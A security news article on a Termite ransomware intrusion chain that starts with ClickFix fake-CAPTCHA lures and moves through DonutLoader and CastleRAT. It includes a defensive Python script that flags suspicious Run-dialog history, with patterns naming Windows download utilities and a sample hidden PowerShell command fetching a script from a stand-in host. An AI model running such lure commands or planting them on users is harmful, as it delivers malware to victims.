Security researchers recently uncovered a new intrusion chain connected to Termite ransomware activity. The operation relies on social engineering and legitimate Windows tools to infiltrate networks. Instead of exploiting software vulnerabilities, attackers manipulate victims into running malicious commands themselves.
The campaign uses a technique known as ClickFix. This method tricks users into executing commands that silently download malware components. Once attackers gain access, they deploy additional tools that help them explore the network and maintain persistence.
Researchers say the activity highlights how ransomware groups continue refining their attack strategies. Modern intrusions often unfold through several stages before the final ransomware payload appears.
Threat Group Behind the Activity
Investigators linked the campaign to a threat group tracked as Velvet Tempest. Security teams also identify the group under the name DEV-0504. The actors have operated in the ransomware ecosystem for several years.
Researchers associate the group with multiple well-known ransomware families. Previous campaigns involved operations connected to Ryuk, Conti, LockBit, BlackCat, and REvil. The group often works as an affiliate within larger ransomware networks.
During the latest investigation, analysts observed the attackers operating inside a simulated corporate environment. The scenario represented a large organization with thousands of users and endpoints. The operators conducted hands-on keyboard activity while mapping the network and identifying potential targets.
ClickFix Used to Gain Initial Access
The intrusion began with a malvertising campaign that delivered a ClickFix lure. Victims encountered a fake CAPTCHA prompt while browsing the web. The page displayed instructions that appeared to solve a verification step.
Instead of confirming a CAPTCHA, the instructions asked users to paste a command into the Windows Run dialog. When victims executed the command, the system launched a sequence of hidden operations.
The commands relied on built-in Windows utilities. These tools downloaded files and triggered additional scripts without raising immediate alarms. Because the activity uses legitimate system tools, some security products may struggle to detect it early.
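Because the lure asks the victim to type into the Run dialog, one artifact an incident responder can check on a suspected host is Explorer's own Run history, which Windows keeps in the per-user RunMRU registry key. The Python below is an added example written for this page, not code from the researchers or from any tool named in the report: it parses a `reg export` of that key, restores the most-recent-first order from `MRUList`, and flags entries that pair a built-in utility with a remote source or a quiet-execution flag. The key path and the `.reg` escaping rules are real; the sample export is constructed, and the indicator list and thresholds are this editor's heuristics, to be tuned per environment.

```python
import re
from dataclasses import dataclass, field

# Explorer records Run-dialog (Win+R) history per user under this key. Each command is
# stored as a string value named with a single letter, suffixed with a literal "\1";
# the "MRUList" value lists those letters, most recent first.
RUNMRU_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Heuristic indicators of a ClickFix-style command: a utility that can fetch or run
# remote content, plus a remote source or a flag meant to keep the execution quiet.
LOLBIN_RE = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|curl|certutil|bitsadmin|wscript|cscript|rundll32|msiexec)(\.exe)?\b", re.I)
URL_RE = re.compile(r"https?://|\b[a-z0-9-]+(\.[a-z0-9-]+)+/", re.I)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)
ENCODED_RE = re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
BYPASS_RE = re.compile(r"-e(p|xecutionpolicy)\s+bypass", re.I)
# Lures often pad the command with text that echoes the fake CAPTCHA prompt.
LURE_RE = re.compile(r"robot|captcha|verif", re.I)

REG_VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$', re.M)


@dataclass
class RunEntry:
    order: int                      # 0 = most recently typed
    value_name: str
    command: str
    indicators: list = field(default_factory=list)


def parse_reg_export(text):
    """Turn the body of a `reg export` of the RunMRU key into {value_name: data}.
    .reg files are UTF-16LE on disk, so read them with encoding="utf-16" first.
    Backslashes and quotes inside the data are escaped with a backslash; undo that."""
    return {name: re.sub(r"\\(.)", r"\1", data) for name, data in REG_VALUE_RE.findall(text)}


def order_entries(values):
    """Order the letter-named entries by MRUList and strip the trailing \\1 marker."""
    entries = []
    for i, name in enumerate(values.get("MRUList", "")):
        raw = values.get(name)
        if raw is None:
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        entries.append(RunEntry(i, name, cmd))
    return entries


def score_command(cmd):
    """List the indicators present in one Run-dialog command."""
    checks = [("lolbin", LOLBIN_RE), ("url", URL_RE), ("hidden_window", HIDDEN_RE),
              ("encoded", ENCODED_RE), ("policy_bypass", BYPASS_RE), ("lure_text", LURE_RE)]
    hits = [label for label, rx in checks if rx.search(cmd)]
    if len(cmd) > 150:
        hits.append("unusually_long")
    return hits


def triage(values):
    """Return the entries worth an analyst's attention: a LOLBin combined with at least
    one other indicator. A bare `cmd` or `powershell` is ordinary administrator usage."""
    entries = order_entries(values)
    for e in entries:
        e.indicators = score_command(e.command)
    return [e for e in entries if "lolbin" in e.indicators and len(e.indicators) >= 2]


# Constructed sample export: two ordinary entries and one lure-style command.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="\\\\fs01.corp.example\\share\\1"
"MRUList"="cab"
"c"="powershell -w hidden -c \"iwr http://example.invalid/verify -OutFile $env:TEMP\\v.ps1\"\\1"
'''

if __name__ == "__main__":
    for e in triage(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(f"[{e.order}] {e.value_name}: {e.command}\n     indicators: {', '.join(e.indicators)}")
```

Run against a real export with `triage(parse_reg_export(open("runmru.reg", encoding="utf-16").read()))`. The key is only written when the command is submitted through the Run dialog, so an empty or clean key does not clear a host; it is one corroborating artifact alongside process telemetry.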
Malware Delivery Through DonutLoader
Once attackers gained access, they deployed additional payloads through scripted commands. PowerShell commands downloaded components and compiled .NET payloads directly on the compromised system.
One stage of the attack introduced DonutLoader, a loader commonly used to deliver secondary malware. Through this loader, the attackers installed the CastleRAT backdoor.
CastleRAT provides remote control over infected systems. Attackers can execute commands, collect information, and move laterally across the network. This access allows the operators to expand their presence before launching a final attack.
Researchers also observed Python-based components placed in system directories. These tools helped maintain persistence after system restarts.
Ransomware Stage Not Observed
During the monitored intrusion, researchers did not see the final deployment of Termite ransomware. However, the infrastructure and tools strongly suggest preparation for a ransomware attack.
Threat actors often spend significant time inside a network before launching encryption. They first gather credentials, explore internal systems, and identify valuable data. This preparation allows attackers to maximize the impact of a later ransomware deployment.
Termite ransomware has already been linked to attacks on several organizations. Known incidents include breaches involving SaaS provider Blue Yonder and Australian fertility company Genea.
Social Engineering Continues to Drive Attacks
The ClickFix method reflects a broader shift in cybercrime tactics. Many attackers now rely heavily on social engineering instead of technical exploits.
By persuading users to run commands themselves, criminals bypass some security protections. This approach also reduces the need for complex vulnerability exploits.
Researchers warn that similar techniques will likely appear in future ransomware campaigns. Attackers continue refining social engineering strategies that appear legitimate to victims.
Conclusion
The investigation reveals how modern ransomware campaigns unfold through layered intrusion stages. Activity connected to Termite ransomware demonstrates how attackers combine social engineering with legitimate system tools.
The ClickFix technique allows criminals to gain initial access without exploiting vulnerabilities. Once inside a network, attackers deploy loaders, remote access tools, and persistence mechanisms.
Although the monitored attack stopped before encryption occurred, the infrastructure indicates preparation for a full ransomware operation. Organizations must remain alert to social engineering attacks that encourage users to execute unfamiliar commands.
Improved security awareness and stronger monitoring remain essential defenses against evolving ransomware threats.